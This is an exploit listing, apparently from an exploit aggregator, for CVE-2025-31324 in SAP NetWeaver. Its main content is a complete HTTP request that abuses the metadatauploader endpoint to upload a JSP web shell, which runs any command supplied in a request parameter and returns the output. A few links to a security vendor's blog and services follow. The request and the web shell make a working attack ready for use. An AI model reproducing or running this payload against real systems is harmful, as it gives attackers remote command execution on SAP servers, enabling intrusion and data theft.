Exploit for Unrestricted Upload of File with Dangerous Type in Sap Netweaver CVE-2025-31324

## https://sploitus.com/exploit?id=88813D80-9802-5DEA-9107-2FF5FF6EB264
# CVE-2025-31324
CVE-2025-31324, SAP Exploit
```
POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=11111111111111111111111111

--11111111111111111111111111
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

--11111111111111111111111111--

```
[CVE-2025-31324](https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/)
[SAP Penetration Testing](https://redrays.io/sap-penetration-testing/)
[SAP ABAP Code Scanner](https://redrays.io/abap-scanner/)